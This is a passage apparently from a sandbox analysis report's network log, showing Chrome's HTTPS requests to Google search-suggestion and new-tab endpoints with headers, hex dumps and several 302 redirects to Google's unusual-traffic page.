2024-05-02 02:56:05 UTC	1191	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 02:56:04 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-33jPA5iP7hHE-UUbLr0jeg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-02 02:56:05 UTC	64	IN	Data Raw: 33 31 32 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 70 73 20 70 6c 75 73 20 6d 61 79 20 32 30 32 34 20 6d 6f 6e 74 68 6c 79 20 67 61 6d 65 73 22 2c 22 73 74 61 72 20 77 61 72 73 20 62 61 64 20 62 Data Ascii: 312)]}'["",["ps plus may 2024 monthly games","star wars bad b
2024-05-02 02:56:05 UTC	729	IN	Data Raw: 61 74 63 68 20 73 65 61 73 6f 6e 20 33 22 2c 22 61 6d 74 72 61 6b 20 62 6f 72 65 61 6c 69 73 20 74 72 61 69 6e 73 22 2c 22 65 64 6d 6f 6e 74 6f 6e 20 6f 69 6c 65 72 73 20 76 73 20 6b 69 6e 67 73 20 70 72 65 64 69 63 74 69 6f 6e 22 2c 22 6f 6b 6c 61 68 6f 6d 61 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 73 73 69 20 63 68 65 63 6b 73 22 2c 22 70 6f 73 74 20 6d 61 6c 6f 6e 65 20 6d 6f 72 67 61 6e 20 77 61 6c 6c 65 6e 20 63 6f 6e 63 65 72 74 22 2c 22 61 70 70 6c 65 20 69 70 68 6f 6e 65 20 61 6c 61 72 6d 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 6c 65 3a 63 6c 69 65 6e 74 64 61 74 61 22 3a 7b 22 62 70 63 22 3a 66 61 6c 73 65 2c 22 70 72 65 22 3a 30 2c 22 74 6c 77 22 3a 66 61 6c 73 65 7d 2c Data Ascii: atch season 3","amtrak borealis trains","edmonton oilers vs kings prediction","oklahoma tornadoes","ssi checks","post malone morgan wallen concert","apple iphone alarms"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"pre":0,"tlw":false},
2024-05-02 02:56:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49169	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:05 UTC	837	OUT	GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ== Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cookie: CONSENT=PENDING+962; SOCS=CAESHAgCEhJnd3NfMjAyMzA4MDEtMF9SQzMaAmVuIAEaBgiAi8amBg; __Secure-ENID=14.SE=LM-NkPAvbCtuNhK73uRS1U27fKMegq7R6_Ue_GnOGI1dekNKandC6Dto1fKS9ocnnyUmf2MAXGM269U9HhkgndYLxWy3FrZaGzh_yODdv1ouU12fBCNmRhMUwM3dzKbRlYRnbKhIQz9fV5WGdCRRjXQx5RGii6FbIw100Hc46oWQ6bysmy2hqA
2024-05-02 02:56:05 UTC	1703	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 02:56:05 GMT Pragma: no-cache Expires: -1 Cache-Control: no-cache, must-revalidate Content-Type: text/javascript; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-b6mrTgKyqIixDgsFcfMVDQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]} Accept-CH: Sec-CH-UA-Platform Accept-CH: Sec-CH-UA-Platform-Version Accept-CH: Sec-CH-UA-Full-Version Accept-CH: Sec-CH-UA-Arch Accept-CH: Sec-CH-UA-Model Accept-CH: Sec-CH-UA-Bitness Accept-CH: Sec-CH-UA-Full-Version-List Accept-CH: Sec-CH-UA-WoW64 Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= Content-Disposition: attachment; filename="f.txt" Server: gws X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-05-02 02:56:05 UTC	896	IN	Data Raw: 33 37 39 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 66 69 73 68 69 6e 67 20 67 75 69 64 65 20 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 22 2c 22 66 65 64 65 72 61 6c 20 72 65 73 65 72 76 65 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 73 22 2c 22 64 72 61 6b 65 20 6d 61 79 65 22 2c 22 66 6f 72 74 6e 69 74 65 20 72 65 73 74 6f 72 65 64 20 72 65 65 6c 73 20 64 61 6e 63 65 20 66 6c 6f 6f 72 22 2c 22 73 6f 76 69 65 74 20 65 72 61 20 63 6f 6d 62 61 74 20 61 69 72 63 72 61 66 74 22 2c 22 67 6f 6f 67 6c 65 20 6c 61 79 6f 66 66 73 20 6d 65 78 69 63 6f 22 2c 22 64 65 65 62 6f 20 73 61 6d 75 65 6c 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d 2c 7b 22 67 6f 6f 67 Data Ascii: 379)]}'["",["nyt crossword clues","fishing guide stellar blade","federal reserve interest rates","drake maye","fortnite restored reels dance floor","soviet era combat aircraft","google layoffs mexico","deebo samuel"],["","","","","","","",""],[],{"goog
2024-05-02 02:56:05 UTC	98	IN	Data Raw: 35 63 0d 0a 41 51 41 41 41 41 41 41 41 41 41 41 41 51 49 41 41 77 51 52 49 54 45 53 45 79 4a 52 59 51 58 2f 32 67 41 4d 41 77 45 41 41 68 45 44 45 51 41 2f 41 4c 78 6f 6f 6f 71 53 54 51 31 76 56 37 48 51 74 4e 6d 31 48 56 4a 31 67 74 6f 52 6c 6d 4f 35 4a 37 41 44 75 54 39 4b 6f 7a 69 6a 0d 0a Data Ascii: 5cAQAAAAAAAAAAAQIAAwQRITESEyJRYQX/2gAMAwEAAhEDEQA/ALxoooqSTQ1vV7HQtNm1HVJ1gtoRlmO5J7ADuT9Kozij
2024-05-02 02:56:05 UTC	1255	IN	Data Raw: 63 34 61 0d 0a 78 6a 31 72 55 4c 6e 2f 41 4b 2f 6e 54 4c 4e 66 77 6c 34 31 65 56 2f 56 73 67 67 65 77 7a 37 6e 74 37 38 56 4f 4a 5a 75 4c 4f 49 7a 6f 65 6e 45 53 61 64 70 30 68 42 43 6a 65 57 63 41 68 6d 39 68 75 6f 2b 54 76 6b 56 48 6c 34 44 31 4f 38 6a 6a 4b 68 49 77 54 6a 66 63 67 66 58 70 51 32 63 41 36 4d 4d 6c 54 4d 4e 67 53 7a 75 45 50 47 48 53 62 72 51 6e 6b 34 6d 6e 6a 74 4e 52 74 32 43 53 4a 47 68 49 6d 42 36 4f 6f 47 66 6e 73 50 6b 56 50 4e 41 34 69 30 76 69 43 46 70 64 4b 75 6b 6e 56 64 7a 67 6a 49 39 78 32 39 6a 76 58 4e 6c 39 77 56 65 32 45 2f 6d 33 55 57 59 65 67 61 4d 35 47 33 31 46 4f 2f 43 65 38 62 53 66 45 61 78 69 58 61 4f 39 6a 6b 74 6e 43 39 44 74 7a 41 2f 64 52 56 71 34 50 69 55 31 52 55 62 4d 36 4f 6f 6f 6f 72 75 43 68 53 6a 69 2b Data Ascii: c4axj1rULn/AK/nTLNfwl41eV/Vsggewz7nt78VOJZuLOIzoenESadp0hBCjeWcAhm9huo+TvkVHl4D1O8jjKhIwTjfcgfXpQ2cA6MMlTMNgSzuEPGHSbrQnk4mnjtNRt2CSJGhImB6OoGfnsPkVPNA4i0viCFpdKuknVdzgjI9x29jvXNl9wVe2E/m3UWYegaM5G31FO/Ce8bSfEaxiXaO9jktnC9DtzA/dRVq4PiU1RUbM6OoooruChSji+
2024-05-02 02:56:05 UTC	1255	IN	Data Raw: 45 32 73 54 41 55 41 64 43 30 49 70 51 22 2c 22 74 22 3a 22 44 72 61 6b 65 20 4d 61 79 65 22 2c 22 7a 61 65 22 3a 22 2f 67 2f 31 31 66 79 37 66 78 79 6c 35 22 2c 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 7a 6c 22 3a 31 30 30 30 32 7d 2c 7b 22 61 22 3a 22 46 6f 6f 74 62 61 6c 6c 20 77 69 64 65 20 72 65 63 65 69 76 65 72 22 2c 22 64 63 22 3a 22 23 61 33 31 64 32 61 22 2c 22 69 22 3a 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a 52 67 41 42 41 51 41 41 41 51 41 42 41 41 44 2f 32 77 43 45 41 41 6b 47 42 77 67 48 42 67 6b 49 42 77 67 4b 43 67 6b 4c 44 52 59 50 44 51 77 4d 44 52 73 55 46 52 41 57 49 42 30 69 49 69 41 64 48 Data Ascii: E2sTAUAdC0IpQ","t":"Drake Maye","zae":"/g/11fy7fxyl5","zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"a":"Football wide receiver","dc":"#a31d2a","i":"data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBwgHBgkIBwgKCgkLDRYPDQwMDRsUFRAWIB0iIiAdH
2024-05-02 02:56:05 UTC	643	IN	Data Raw: 64 53 32 36 66 4e 74 6b 6c 54 39 74 6c 4f 52 33 43 4d 48 52 30 55 50 55 48 59 2b 39 65 70 7a 61 57 58 6c 4e 41 71 4b 30 6b 68 52 4a 7a 6e 66 74 57 4b 6f 34 4f 66 53 71 63 54 61 59 30 57 6b 69 6a 67 78 35 79 35 37 72 74 34 50 69 58 4e 61 43 55 33 43 33 4e 50 41 66 55 74 68 5a 51 66 75 41 63 67 2f 6b 55 77 37 5a 50 6a 33 53 41 7a 4e 68 75 42 62 4c 71 64 53 53 43 44 6a 7a 42 78 33 48 51 30 6a 72 57 79 5a 64 7a 69 73 4a 4b 51 58 48 55 67 46 61 64 53 65 76 63 64 78 36 55 7a 4f 42 4a 78 6d 76 7a 79 30 35 49 65 5a 53 76 51 70 32 53 76 43 69 73 62 59 53 32 6e 35 55 4a 36 39 4e 7a 33 70 69 47 52 78 35 58 41 33 6e 51 51 51 74 79 69 62 58 7a 35 35 39 4c 2f 2f 32 51 5c 75 30 30 33 64 5c 75 30 30 33 64 22 2c 22 71 22 3a 22 67 73 5f 73 73 70 5c 75 30 30 33 64 65 4a 7a Data Ascii: dS26fNtklT9tlOR3CMHR0UPUHY+9epzaWXlNAqK0khRJznftWKo4OfSqcTaY0Wkijgx5y57rt4PiXNaCU3C3NPAfUthZQfuAcg/kUw7ZPj3SAzNhuBbLqdSSCDjzBx3HQ0jrWyZdzisJKQXHUgFadSevcdx6UzOBJxmvzy05IeZSvQp2SvCisbYS2n5UJ69Nz3piGRx5XA3nQQQtyibXz559L//2Q\u003d\u003d","q":"gs_ssp\u003deJz
2024-05-02 02:56:05 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.22	49170	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:09 UTC	353	OUT	GET /async/ddljson?async=ntp:2 HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 02:56:10 UTC	1816	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgS_YJbhGMmBzLEGIjB5NrDOyf958iCbJpAJxeAyyHGDgUuUJYBV60K9olc20v99BBChXQUVByr6JLh_QvcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIyoHMsQYQ8LSZ2AESBL9gluE Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 02:56:10 GMT Server: gws Content-Length: 427 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=HUFB3BqTTa_KNGVmrvlKoTvH03RrsTpEVDlAzpIUgYLSponCNsFmoCoVDVj7bkRpYLFKuAOEfusWF9OitibxJ1bqCS5oySNkqafLexHIoTJ8nAL5PiNrDalI58sXPf5G0y1dVonwmFMA2-YQi0zyXtJPcVD6zYdTz1MijQjW_GQ; expires=Fri, 01-Nov-2024 02:56:09 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:10 UTC	427	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 64 64 6c 6a 73 6f 6e 25 33 46 61 73 79 6e Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.22	49171	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:10 UTC	446	OUT	GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1 Host: www.google.com Connection: keep-alive X-Client-Data: CIa2yQEIorbJAQipncoBCKj3ygEIlqHLAQiFoM0BCNy9zQEIuMjNAQ== Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 02:56:10 UTC	1843	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgS_YJbhGMqBzLEGIjAmi-UIIFqSTjkw-RfWXi2GfkOK6xdeNQDHNk-OB5e4eww8XVW3FAYyUUV3pTR2uxYyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIyoHMsQYQ9e-Q0wISBL9gluE Content-Type: text/html; charset=UTF-8 Strict-Transport-Security: max-age=31536000 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 02:56:10 GMT Server: gws Content-Length: 458 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=nQDSKKCUY72nbduCHcRHhXACOPv96Kxy9BGRkfztkyu42Rwrd_gHXoam_RmDAYCnj8eZlKgLn5fWew08N8kSyFNPm8WqA8IlPx75gPq5HjHDBfOIlzDJCalLIF09aVWJgIdxbVFWcdPC2s7k68aYWtAFmlXnyKvJy0ZNSikFz3w; expires=Fri, 01-Nov-2024 02:56:10 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:10 UTC	458	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.22	49172	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 02:56:11 UTC	353	OUT	GET /async/newtab_promos HTTP/1.1 Host: www.google.com Connection: keep-alive Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-02 02:56:11 UTC	1761	IN	HTTP/1.1 302 Found Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgS_YJbhGMuBzLEGIjDHkOYETEkfpPO5BNVM4qFB3EzErW1N_BxHwWaZNSSd6fpa03DeWClTlQmn-8-Tj7IyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM x-hallmonitor-challenge: CgwIy4HMsQYQubfk7QISBL9gluE Content-Type: text/html; charset=UTF-8 Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws" Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]} Permissions-Policy: unload=() Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0= Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0= P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info." Date: Thu, 02 May 2024 02:56:11 GMT Server: gws Content-Length: 417 X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Set-Cookie: 1P_JAR=2024-05-02-02; expires=Sat, 01-Jun-2024 02:56:11 GMT; path=/; domain=.google.com; Secure; SameSite=none Set-Cookie: NID=513=fgAQ-FMftBn8U6qLB_xWWkkkc9DVEvN_N6o2tEue_K4GUZExVgaPgdzwdYTojqKVxXyKNrqWVPheSLnkhhM1Yn5U2V873JQdGiigIZ_Y-T9zYj0D29_T15mASCX6KaFQVRLJg0wObsmDE1eXTDGt31FHclpLdrGt-svEoASRDdY; expires=Fri, 01-Nov-2024 02:56:11 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-05-02 02:56:11 UTC	417	IN	Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26 Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.22	49178	172.217.1.4	443	2960	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
